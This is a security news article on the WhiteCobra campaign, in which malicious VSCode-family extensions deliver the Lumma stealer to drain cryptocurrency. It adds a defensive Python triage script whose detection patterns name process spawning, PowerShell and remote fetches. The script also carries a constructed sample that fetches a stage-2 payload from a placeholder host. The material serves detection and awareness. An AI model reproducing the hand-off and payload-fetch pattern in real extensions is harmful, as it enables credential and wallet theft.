WhiteCobra Group Deploys Malicious VSCode Extensions to Steal Cryptocurrency

Analysts at Koi Security have uncovered a campaign by the WhiteCobra hacker group targeting users of VSCode, Cursor, and Windsurf through malicious extensions published on both the Visual Studio Marketplace and the Open VSX registry. Researchers warn that the campaign remains active, as the attackers continue uploading new malware to replace removed extensions.
The First Signs
Last month, Ethereum developer Zak Cole revealed that his wallet had been drained after using the contractshark.solidity-lang extension for the Cursor editor. Cole noted that the extension appeared harmless, featuring a professional-looking icon, detailed description, and more than 54,000 downloads on OpenVSX.
Koi Security has since linked this incident to the WhiteCobra group, which in July 2025 alone stole more than $500,000 in cryptocurrency using a malicious Cursor AI extension.

Why Extensions Are Vulnerable
VSCode, Cursor, and Windsurf all support VSIX extensions—a shared package format, so the same extension can be installed in any of these editors. While this standardization benefits developers, the lack of rigorous vetting on extension repositories has created an ideal attack surface for threat actors.
WhiteCobra exploits this by crafting extensions with convincing descriptions, polished branding, and artificially inflated download counts, giving them the appearance of legitimacy.
Malicious Extensions Identified
Koi Security reports that the following extensions were part of WhiteCobra’s latest campaign:
Open-VSX (Cursor/Windsurf):
- solidity-pro
- kilocode-ai.kilo-code
- nomic-fdn.hardhat-solidity
- oxc-vscode.oxc
- juan-blanco.solidity
- solidity-ethereum-vsc
- solidityethereum
- solidity-ai-ethereum
- solidity-ethereum
- hardhat-solidity
- juan-blanco.vscode-solidity
- nomic-foundation.hardhat-solidity
- nomic-fdn.solidity-hardhat
- Crypto-Extensions.solidity
- Crypto-Extensions.SnowShsoNo
VS Code Marketplace:
- awswhh
- etherfoundrys
- givingblankies
- wgbk
- VitalikButerin-EthFoundation.blan-co
- SnowShoNo
- Crypto-Extensions.SnowShsoNo
- rojo-roblox-vscode
How the Attack Works
The theft begins when the extension’s main file (extension.js) executes. Though nearly identical to the standard “Hello World” template that new VSCode extensions are scaffolded from, it contains a hidden call that redirects execution to a secondary script (prompt.js).

From there, a payload is downloaded from Cloudflare Pages. Versions are tailored for Windows, macOS on ARM, and macOS on Intel:
- Windows: A PowerShell script runs a Python script, which then executes shellcode to launch the Lumma stealer. This malware harvests data from cryptocurrency wallets, browser credentials and extensions, and messaging apps.
- macOS: A malicious Mach-O binary is executed locally, loading an as-yet unidentified malware family.
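As an added illustration, not Koi Security's tooling or anything taken from the report, the following Python triage script looks for the hand-off pattern just described: it reads each installed extension's package.json, follows the main file's local require() calls one hop, and scores the combined source for network fetches, process spawning and shell-interpreter mentions. The extension directories, indicator regexes and the sample extension are assumptions constructed for this example.

```python
# Heuristic triage of installed extensions for the hand-off pattern described above: a near-template
# main file that requires a second local script which reaches out to the network and spawns a process.
import json
import re
from pathlib import Path

# Extension roots for the three editors named in the report (assumed default paths).
EXTENSION_ROOTS = [Path.home() / d / "extensions" for d in (".vscode", ".cursor", ".windsurf")]
LOCAL_REQUIRE = re.compile(r"""require\(\s*['"](\.{1,2}/[^'"]+)['"]\s*\)""")  # require("./x.js")
INDICATORS = {  # crude one-point signals; tune before relying on them
    "remote_fetch": re.compile(r"https?://|\bfetch\(|https\.get\("),
    "spawns_process": re.compile(r"child_process|\b(?:exec|spawn)(?:Sync)?\("),
    "shell_interpreter": re.compile(r"powershell|python", re.I),
}

def triage(manifest: dict, files: dict) -> dict:
    """Score one extension; files maps relative path -> source of the main file and its local requires."""
    main = manifest.get("main", "extension.js").removeprefix("./")
    hand_offs = [Path(r).name for r in LOCAL_REQUIRE.findall(files.get(main, ""))]
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search("\n".join(files.values())))
    eager = any(ev in ("*", "onStartupFinished") for ev in manifest.get("activationEvents", []))
    return {"id": f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}", "hands_off_to": hand_offs,
            "indicators": hits, "score": len(hits) + int(eager and bool(hits))}  # eager start only adds to hits

def load_extension(ext_dir: Path) -> dict:
    """Read package.json, the main file and the local scripts it require()s (one hop), then triage."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    main_rel = manifest.get("main", "extension.js").removeprefix("./")
    main, files = ext_dir / main_rel, {}
    if main.is_file():
        files[main_rel] = main.read_text(encoding="utf-8", errors="ignore")
        for rel in LOCAL_REQUIRE.findall(files[main_rel]):
            dep = main.parent / (rel if rel.endswith(".js") else rel + ".js")
            if dep.is_file():
                files[rel] = dep.read_text(encoding="utf-8", errors="ignore")
    return triage(manifest, files)

def scan_roots(roots=EXTENSION_ROOTS, min_score=2) -> list:
    """Triage every installed extension under roots; return those scoring at least min_score."""
    recs = [load_extension(p) for r in roots if r.is_dir() for p in r.iterdir() if (p / "package.json").is_file()]
    return sorted((x for x in recs if x["score"] >= min_score), key=lambda x: -x["score"])

# Constructed sample, not real malware: a Hello World main that quietly hands off to prompt.js.
SAMPLE_MANIFEST = {"publisher": "example-pub", "name": "solidity-helper", "main": "./extension.js", "activationEvents": ["*"]}
SAMPLE_FILES = {
    "extension.js": 'const vscode = require("vscode");\nfunction activate() {\n'
                    '  vscode.window.showInformationMessage("Hello World"); require("./prompt.js");\n}\n',
    "prompt.js": 'const { exec } = require("child_process");  // stand-in: would hand the download to powershell\n'
                 'fetch("https://PLACEHOLDER.invalid/stage2");  // PLACEHOLDER host, nothing real is fetched\n',
}
```

Running `scan_roots()` on a workstation lists the installed extensions that combine an eager activation event with these signals; the score is a triage aid, not a verdict, since legitimate tooling also spawns processes and fetches updates.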

WhiteCobra’s Playbook
According to an internal WhiteCobra guide obtained by researchers, the group sets profit targets between $10,000 and $500,000 per campaign. The guide also details instructions for command-and-control setup, social engineering tactics, and promotional strategies to lure unsuspecting users.
Researchers highlight that WhiteCobra operates with high efficiency: after an extension is blocked, the group is often able to launch a new campaign within three hours.
A Call for Stronger Defenses
Analysts stress that repository safeguards are inadequate. Current indicators such as ratings, download counts, and user reviews can be easily manipulated, allowing malicious extensions to spread unchecked. Stronger verification mechanisms, they argue, are urgently needed to protect developers and end users.